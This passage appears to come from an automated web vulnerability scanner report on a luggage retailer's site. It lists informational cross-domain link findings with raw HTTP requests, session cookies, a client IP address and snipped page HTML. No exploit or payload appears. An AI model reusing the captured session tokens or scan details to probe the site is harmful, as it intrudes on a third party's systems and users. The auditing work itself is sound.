<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
<a href="#" onclick="BuildFlash('120830_2_1', 'true', 'true', '1');return false;">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
<a href="#" onclick="BuildFlash('120830_3_1', 'true', 'true', '1');return false;">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60" width="25" height="25" style="border: 1px solid #ccc"></a>
...[SNIP]...
<a href="#" onclick="BuildFlash('120830_1_2', 'true', 'true', '1'); return false;"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40"
width="40" height="40" alt="Product Image" hspace="4" vspace="5" border="0"></a>
<a href="#" onclick="BuildFlash('120830_1_3', 'true', 'true', '1'); return false;"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40"
width="40" height="40" alt="Product Image" hspace="4" vspace="5" border="0"></a>
...[SNIP]...
</div>
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_usm=1,1,1&hei=460&wid=460" id="mnImg" style="display:none;">
</td>
...[SNIP]...

4.17. http://www.ebags.com/rewards/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/rewards/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/rewards/index.cfm?fuseaction=signup

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/2010-1028-Header-Rewards.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /rewards/index.cfm?fuseaction=signup HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:00 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 43464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<div class="content-rewards">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/2010-1028-Header-Rewards.jpg" alt="eBags Rewards Club" border=0 />
<h3>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.18. http://www.ebags.com/shoppingcart/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=true

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106975_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/15026_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/68256_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=12%2f26%2f2010+6%3a55%3a59+AM&requesttimeout=9000&itemAdded=true HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 16:26:07 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID; expires=Sun, 02-Jan-2011 16:26:07 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 53790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/handbags/department/index.cfm?sub_site_id=14"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg" alt="Handbags" border="0"></a>
...[SNIP]...
<a href="/luggage/department/index.cfm?sub_site_id=16"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg" alt="Luggage" border="0"></a>
...[SNIP]...
<a href="/business_cases/department/index.cfm?sub_site_id=25"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg" alt="Business & Laptops" border="0"></a>
...[SNIP]...
<a href="/backpacks/department/index.cfm?sub_site_id=10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg" alt="Backpacks" border="0"></a>
...[SNIP]...
<a href="/urban_gear/department/index.cfm?sub_site_id=21"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg" alt="Messengers" border="0"></a>
...[SNIP]...
<a href="/travel_accessories/department/index.cfm?sub_site_id=24"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg" alt="Travel Accessories" border="0"></a>
...[SNIP]...
<a href="/product/ebags/weekender-etech-convertible/15026?productid=56582&rlid=search_no&rcode=res10122608330606111013612" title="eBags Weekender eTech Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/15026_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Weekender eTech Convertible Backpacks"></a>
...[SNIP]...
="/product/ebags/value-set-mother-lode-mini-firewall-brief/106975?productid=1281995&rlid=search_no&rcode=res10122608330606111013612" title="eBags Value Set: Mother Lode Mini + Firewall Brief Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im5/106975_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode Mini + Firewall Brief Luggage"></a>
...[SNIP]...
"/product/ebags/mother-lode-tls-junior-25-wheeled-duffel/125548?productid=1325229&rlid=search_no&rcode=res10122608330606111013612" title="eBags Mother Lode TLS Junior 25" Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125548_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Junior 25" Wheeled Duffel Luggage"></a>
...[SNIP]...
f="/product/ebags/mother-lode-etech-mini-21-wheeled-duffel/68256?productid=837488&rlid=search_no&rcode=res10122608330606111013612" title="eBags Mother Lode eTech Mini 21" Wheeled Duffel Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/68256_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode eTech Mini 21" Wheeled Duffel Luggage"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
...[SNIP]...

4.19. http://www.ebags.com/shoppingcart/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/shoppingcart/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/shoppingcart/index.cfm?FuseAction=viewcart&CurrentTime=%7Bts%20%272010%2D12%2D26%2006%3A59%3A34%27%7D&requesttimeout=2000

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/106986_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/127926_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/106967_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:38 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 53903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/handbags/department/index.cfm?sub_site_id=14"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_01.jpg" alt="Handbags" border="0"></a>
...[SNIP]...
<a href="/luggage/department/index.cfm?sub_site_id=16"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_02.jpg" alt="Luggage" border="0"></a>
...[SNIP]...
<a href="/business_cases/department/index.cfm?sub_site_id=25"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_03.jpg" alt="Business & Laptops" border="0"></a>
...[SNIP]...
<a href="/backpacks/department/index.cfm?sub_site_id=10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_04.jpg" alt="Backpacks" border="0"></a>
...[SNIP]...
<a href="/urban_gear/department/index.cfm?sub_site_id=21"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_05.jpg" alt="Messengers" border="0"></a>
...[SNIP]...
<a href="/travel_accessories/department/index.cfm?sub_site_id=24"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/NSR_06.jpg" alt="Travel Accessories" border="0"></a>
...[SNIP]...
<a href="/product/ebags/value-set-mother-lode-jr-weekender/106967?productid=1281965&rlid=search_no&rcode=res10122605249151377589046" title="eBags Value Set: Mother Lode Jr. + Weekender Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im7/106967_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode Jr. + Weekender Luggage"></a>
...[SNIP]...
<a href="/product/ebags/value-set-mother-lode-junior-mini/106986?productid=1282031&rlid=search_no&rcode=res10122605249151377589046" title="eBags Value Set: Mother Lode + Junior + Mini Luggage">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/106986_4_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Value Set: Mother Lode + Junior + Mini Luggage"></a>
...[SNIP]...
<a href="/product/hartmann-luggage/tweed-cosmetic-tote/127926?productid=1331914&rlid=search_no&rcode=res10122605249151377589046" title="Hartmann Luggage Tweed™ Cosmetic Tote Travel Accessories">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im6/127926_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="Hartmann Luggage Tweed™ Cosmetic Tote Travel Accessories"></a>
...[SNIP]...
<a href="/product/ebags/mother-lode-tls-weekender-convertible/143101?productid=1370034&rlid=search_no&rcode=res10122605249151377589046" title="eBags Mother Lode TLS Weekender Convertible Backpacks">
<img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im1/143101_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=60&hei=115&wid=115" border="0" height=115 width=115 alt="eBags Mother Lode TLS Weekender Convertible Backpacks"></a>
...[SNIP]...
